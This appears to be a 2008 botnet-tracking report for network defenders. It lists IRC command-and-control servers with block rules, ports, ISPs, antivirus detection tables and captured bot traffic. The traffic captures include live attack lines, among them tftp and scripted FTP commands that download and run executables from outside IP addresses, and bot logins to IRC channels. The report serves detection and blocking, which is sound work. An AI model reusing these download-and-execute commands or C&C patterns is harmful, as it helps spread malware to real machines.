Authentium	MISSED
Avast	_Virut-B
AVG	Virut.A
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.fam
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	Virut.a
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	Virut.az
Sophos	SusUnkPacker
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Virut.A

Priority 11	TCP Ports 2345 2345 66	Filter deny ip host 084.244.005.183 any log ! 11 infects 05/15/08 to 06/12/08 brimob.org	ISP spray network services ab
Clients 11	sweden	Activity	Domain brimob.org

Chatter Example

Client: GET /vires.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET /vires.jpg HTTP/1.0User-Agent: Mozilla 1.02.45 bizHost:...
Client: NICK NT50|31225048USER NT50|31225048 0 0 :NT50|31225048
Client: USERHOST NT50|31225048
Server: :NT50|31225048 MODE NT50|31225048 :+iw
Client: MODE NT50|31225048 +n+BJOIN #!MU2! Mixxx74USERHOST...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 11	TCP Ports 6667 6667 85 7000 6668	Filter deny ip host 203.186.079.248 any log ! 11 infects 03/14/08 to 03/22/08 ctinets.com	ISP i t city international ltd - por mee factory bui
Clients 11	hong kong	Activity	Domain ctinets.com

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR Tilecomnu.com
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK NU-396215072USER ospszsvzz 0 0 :NU-396215072
Client: USERHOST NU-396215072
Client: MODE NU-396215072 +x+iJOIN #dd dpassUSERHOST NU-396215072MODE...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Win-Xema.variant
AntiVir	BDSAgent.R.3
Authentium	MISSED
Avast	_Agent-DGQ
AVG	Agent.CVB
BitDefender	DeepScan_Generic.Sdbot.1580CFF3
CAT-QuickHeal	Agent.r
ClamAV	Agent-1373
DrWeb	HLLW.MyBot
eSafe	MISSED
eTrust-Vet	Rbot.FSE
Ewido	Agent.r
FileAdvisor	MISSED
Fortinet	Agent.R!tr.bdr
F-Prot	Threat-HLLIN-Slipper-based!Maximus
F-Secure	Agent.r
Ikarus	Agent.R
Kaspersky	Agent.r
McAfee	MISSED
Microsoft	Rbot!2AC0
NOD32v2	Rbot
Norman	Agent.APUE
Panda	Gaobot.OJE.worm
Prevx1	MISSED
Rising	IRCbot.egs
Sophos	MalPacker
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	BackdoorAgent.r
VBA32	Agent.r
VirusBuster	RBot.IFJ
Webwasher Gateway	Agent.R.3

Priority 10	TCP Ports 8080 10324 8080 67	Filter deny ip host 072.010.172.211 any log ! 10 infects 04/12/08 to 08/15/08 webdesignpro.org	ISP globotech communications
Clients 10	canada	Activity	Domain webdesignpro.org

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 203.91.175.244 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 203.91.175.244 get dllhost.exe wins\\DLLHOST.EXE
Client: USER dxulve dxulve dxulve :ppoycnfotouskfax
Client: NICK REJLTMGE
Client: MODE REJLTMGE +xi
Client: JOIN #las6 USERHOST REJLTMGE
Client: MODE #las6 +smntu
Server: :hub.54535.com 482 REJLTMGE #las6 :You\\'re not channel operator
Client: MODE #rs2 +smntu
Server: :hub.54535.com 482 REJLTMGE #rs2 :You\\'re not channel operator
Client: MODE #fox +smntu
Server: :hub.54535.com 482 REJLTMGE #fox :You\\'re not channel operator
Client: GET /kat3.exe HTTP/1.0Host: zonetech.info
Server: GET /x3.exe HTTP/1.0Host: alwayssam.com
Server: GET /rm.exe HTTP/1.0Host: alwayssam.com

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.NSPM.Gen
Authentium	MISSED
Avast	MISSED
AVG	RBot.KB
BitDefender	Packer.RLPack.D
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	Noupd.5
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	NoUpdate.c
Ikarus	Packer.RLPack.D
Kaspersky	NoUpdate.c
McAfee	MISSED
Microsoft	Qhost.gen!C
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	Suspicious
Rising	MISSED
Sophos	SusUnkPacker
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Crypt.NSPM.Gen

Priority 10	TCP Ports 13001	Filter deny ip host 064.202.117.102 any log ! 10 infects 08/11/08 to 08/11/08 scnet.net	ISP hostforweb inc
Clients 10	united states	Activity	Domain scnet.net

Chatter Example

Client: echo open 122.134.5.94 5821>.pif C:\\WINNT\\system32>
Client: echo user a a>>.pif C:\\WINNT\\system32>
Client: echo binary>>.pif C:\\WINNT\\system32>
Client: echo GET iexplorer.exe>>.pif C:\\WINNT\\system32>
Client: echo bye>>.pif C:\\WINNT\\system32>
Client: echo @echo off >c.batC:\\WINNT\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINNT\\system32>
Client: echo iexplorer.exe >>c.batC:\\WINNT\\system32>
Client: echo del .pif >>c.batC:\\WINNT\\system32>
Client: echo del /F c.bat >>c.batC:\\WINNT\\system32>
Client: echo exit /y >>c.batC:\\WINNT\\system32>
Client: USER a
Client: PASS a
Server: RETR iexplorer.exe
Client: NICK `yurwmzyUSER `yurwmzy 0 0 :`yurwmzy
Server: :irc.time.com NOTICE AUTH :*** Looking up your...
Client: JOIN #.has hs
Server: rs 0-9 a-z A-Z _ - or . in your username. Your username is the...
Client: USERHOST `yurwmzyJOIN #.has hsUSERHOST `yurwmzyJOIN #.has...
Server: :`yurwmzy!~yurwmzy@B661FE5B.35D11F93.763A0D3A.IP JOIN...
Client: JOIN #.sd

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	Virut.X
Authentium	MISSED
Avast	_Agent-AABV
AVG	Virut
BitDefender	Virtob.4.Gen
CAT-QuickHeal	MISSED
ClamAV	Virut.Gen.C-38
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MetaCrypt.1
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	Virut.n
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	Virut.Q
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	Virut.aw
Sophos	MalTibsPak
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	Virut.Gen.5
Webwasher Gateway	Spy.Games.A

Priority 8	TCP Ports 51115 51115 85	Filter deny ip host 069.050.208.003 any log ! 8 infects 04/21/08 to 05/06/08 bulletads.com	ISP atjeu publishing llc
Clients 8	united states	Activity	Domain bulletads.com

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR spwls.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK o2860677178836USER jqmqngpniqeaju 0 0 :o2860677178836
Client: USERHOST o2860677178836
Client: MODE o2860677178836 +iJOIN #mss2 mss2pass
Server: :o2860677178836 MODE o2860677178836...